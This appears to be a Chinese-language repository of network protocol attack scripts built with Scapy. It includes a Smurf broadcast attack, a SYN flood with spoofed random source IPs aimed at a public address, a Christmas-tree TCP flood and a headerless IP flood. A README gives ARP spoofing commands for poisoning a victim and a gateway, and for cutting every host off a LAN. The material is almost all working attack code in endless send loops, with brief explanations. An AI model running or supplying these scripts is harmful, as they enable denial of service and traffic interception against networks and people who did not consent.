├── Arp欺骗 └── README.md ├── README.md ├── Smurf攻击.py ├── dos攻击.py ├── 圣诞树攻击.py └── 没有IP载荷的泛洪.py /Arp欺骗/README.md: -------------------------------------------------------------------------------- 1 | # Network-Protocols-attack-arp 2 | 3 | 网关ip (192.168.1.1) 4 | 5 | 网关MAC (f4:83:cd:96:3d:78) 6 | 7 | 受害者ip(192.168.1.102) 8 | 9 | 受害者MAC(d0:17:c2:17:ed:c8) 10 | 11 | 攻击者IP(192.168.1.128) 12 | 13 | 攻击者MAC(00:0c:29:c5:f2:44) 14 | 15 | 欺骗主机 16 | 17 | hwdst=d0:17:c2:17:ed:c8 (发给102MAC) 18 | 19 | hwsrc=00:0c:29:c5:f2:44 (假冒MAC) 20 | 21 | op=2 22 | 23 | psrc=192.168.1.1 (假冒ip) 24 | 25 | pdst=192.168.1.102 (发给102) 26 | 27 | 28 | 29 | 欺骗网关 30 | 31 | hwdst='f4:83:cd:96:3d:78' (发给网关MAC) 32 | 33 | hwsrc='00:0c:29:c5:f2:44' (假冒MAC) 34 | 35 | op=2 36 | 37 | psrc='192.168.1.102' (假冒ip) 38 | 39 | pdst='192.168.1.1' (发给网关) 40 | 41 | 42 | 43 | 广播让所有人断网 44 | 45 | hwdst='ff:ff:ff:ff:ff:ff' 46 | 47 | hwsrc='00:11:22:33:44:55' 48 | 49 | op=2 50 | 51 | psrc='192.168.1.1' 52 | 53 | sendp(ARP(hwdst='ff:ff:ff:ff:ff:ff',hwsrc='00:11:22:33:44:55',psrc='192.168.1.1',op=2),loop=1) 54 | 55 | sendp(Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(hwsrc='00:11:22:33:44:55',psrc='192.168.1.1',op=2),loop=1) 56 | 57 | ##出现报错 58 | 59 | sendp(Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(hwsrc='00:11:22:33:44:55',psrc='192.168.1.1',op=2),loop=1) 60 | 61 | send(ARP(hwdst='ff:ff:ff:ff:ff:ff',hwsrc='00:11:22:33:44:55',psrc='192.168.1.1',op=2),loop=1) 62 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Protocols-attack 2 | 网络协议攻击之构造畸形数据包 3 | -------------------------------------------------------------------------------- /Smurf攻击.py: -------------------------------------------------------------------------------- 1 | # -*- coding:utf-8 -*- 2 | from scapy.all import * 3 | pkt_smurf=IP(src='192.168.1.2',dst='192.168.255.255')/ICMP(type=8) 4 | while True: 5 | send(pkt_smurf) 6 | 7 | 8 | 9 | # Smurf攻击是指攻击者向目标网络发送源地址为目标主机地址(被攻击者)、目的地址为目标网络广播地址的ICMP请求报文 10 | # 目标网络中的所有主机接收到该报文后,都会向目标主机发送ICMP响应报文 11 | # 导致目标主机收到过多报文而消耗大量资源,甚至导致设备瘫痪或网络阻塞。 12 | -------------------------------------------------------------------------------- /dos攻击.py: -------------------------------------------------------------------------------- 1 | # -*- coding:utf-8 -*- 2 | import random 3 | import struct 4 | from scapy.all import * 5 | 6 | def synFlood(tgt, dPort): 7 | while True: 8 | for sPort in range(1024,65535): 9 | sIP = socket.inet_ntoa(struct.pack('>I', random.randint(1, 0xffffffff))) #产生随机IP 10 | ipLayer = IP(src=sIP, dst=tgt) 11 | tcpLayer = TCP(sport=sPort, dport=dPort,flags="S") 12 | packet = ipLayer / tcpLayer #可尝试在此添加荷载,增大包长度 13 | send(packet) 14 | 15 | if __name__ == '__main__': 16 | synFlood("1.1.1.1",80) #目标IP 17 | -------------------------------------------------------------------------------- /圣诞树攻击.py: -------------------------------------------------------------------------------- 1 | from scapy.all import * 2 | pkt_tree=IP(dst='192.168.1.2')/TCP(flags=0x03f) 3 | while True: 4 | send(pkt_tree) 5 | 6 | 7 | # TCP报文包含6个标志位:URG、ACK、PSH、RST、SYN、FIN,不同的系统对这些标志位组合的应答是不同的: 8 | # 6个标志位全部为1,就是圣诞树攻击。设备在受到圣诞树攻击时,会造成系统崩溃。 9 | -------------------------------------------------------------------------------- /没有IP载荷的泛洪.py: -------------------------------------------------------------------------------- 1 | # -*- coding:utf-8 -*- 2 | from scapy.all import * 3 | pkt=IP(dst='192.168.1.2') #192.168.1.2为被攻击IP 4 | while True: 5 | send(pkt) 6 | 7 | 8 | 9 | # 如果IP报文只有20字节的IP报文头,没有数据部分,就认为是没有IP载荷的报文。 10 | # 攻击者经常构造只有IP头部,没有携带任何高层数据的IP报文,目标设备在处理这些没有IP载荷的报文时会出错和崩溃。 11 | --------------------------------------------------------------------------------